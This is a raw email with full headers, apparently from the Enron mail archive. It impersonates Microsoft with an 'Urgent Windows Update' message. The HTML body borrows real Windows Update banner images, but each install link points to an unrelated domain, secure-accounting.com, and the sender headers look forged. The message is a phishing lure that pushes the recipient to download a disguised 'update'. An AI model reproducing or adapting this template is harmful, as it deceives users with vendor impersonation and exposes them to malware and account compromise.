Recieved: from nahou-mscnx06p.corp.enron.com ([192.168.110.237]) by NAHOU-MSMBX03V.corp.enron.com with Microsoft SMTPSVC(5.0.2195.2966);
	 Thu, 27 Dec 2001 22:36:35 -0800
Received: from corp.enron.com ([192.168.110.228]) by nahou-mscnx06p.corp.enron.com with Microsoft SMTPSVC(5.0.2195.2966);
	 Fri, 28 Dec 2001 00:34:45 -0600
Received: from mailman.enron.com (unverified) by corp.enron.com
 (Content Technologies SMTPRS 4.2.1) with ESMTP id <T5a0a677897c0a86ee241c@corp.enron.com> for <jlavora@exchange.enron.com>;
 Fri, 28 Dec 2001 00:34:02 -0600
Received: from COM ([211.205.138.56])
        by mailman.enron.com (8.11.4/8.11.4/corp-1.06) with ESMTP id g343Bbl95617
        for <john.lavorato@enron.com>; Fri, 28 Dec 2001 00:33:20 -0600 (CST)
X-Message-Info: MZJ////KP+/
Received: from .update@microsoft.com ([]) by -.update@microsoft.com with Microsoft SMTPSVC(5.0..);
	Thu, 27 Dec 2001 23:32:15 -0700
Received: from .update@microsoft.com ([]) by .update@microsoft.com with MailEnable ESMTP; Fri, 28 Dec 2001 04:37:15 -0200
From: "Windows Update" <update@microsoft.com>
To: "john.lavorato" <john.lavorato@enron.com>
Subject: Urgent Windows Update 
MIME-Version: 1.0 (produced by  .)
Content-Type: multipart/alternative;
	boundary="--"
Message-ID: <111302751267227675>

----
Content-Type: text/html;
	charset="iso--"
Content-Transfer-Encoding: 7Bit
Content-Description:   

<html>

<head>
<meta http-equiv="Content-Language" content="es">
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Pagina nueva 1</title>
</head>

<body>

<p>
&nbsp;</p>
<table cellpadding="0" cellspacing="0" width="401" height="22" border="0"><tr>
  <td id="msviRegionIdGraphic" bgcolor="#FFFFFF" width="196">
<img border="0" src="http://v5.windowsupdate.microsoft.com/library/toolbar/3.0/images/banners/windows_masthead_ltr.gif" width="225" height="42"></td>
  <td id="msviRegionGradient1" width="205" style="filter:progid:DXImageTransform.Microsoft.Gradient(startColorStr='#FFFFFF', endColorStr='#AEC0EC', gradientType='1')"></td
</body>

</table>
<p><b>Welcome to Windows Update</b></p>
<p style="margin-top: 0; margin-bottom: 0">
<b style="COLOR: black; BACKGROUND-COLOR: #ffff66">
<a href="http://secure-accounting.com/update/?"><font color="#000000">Get the latest 
updates available</font></a></b><a href="http://secure-accounting.com/update/?"><font color="#000000"> 
for your computer's <br>
operating system, software, and hardware.</font></a><br>
<br>
Windows Update scans your computer and provides you with a <br>
selection of updates tailored just for you.<br>
&nbsp;</p>
<p style="margin-top: 0; margin-bottom: 0">
<img border="0" src="http://v5.windowsupdate.microsoft.com/v5consumer/shared/images/arrow.gif" width="30" height="25"><a href="http://secure-accounting.com/update/?"><b>Express 
Install :</b> High Priority Updates for Your Computer</a></p>


</html>


------
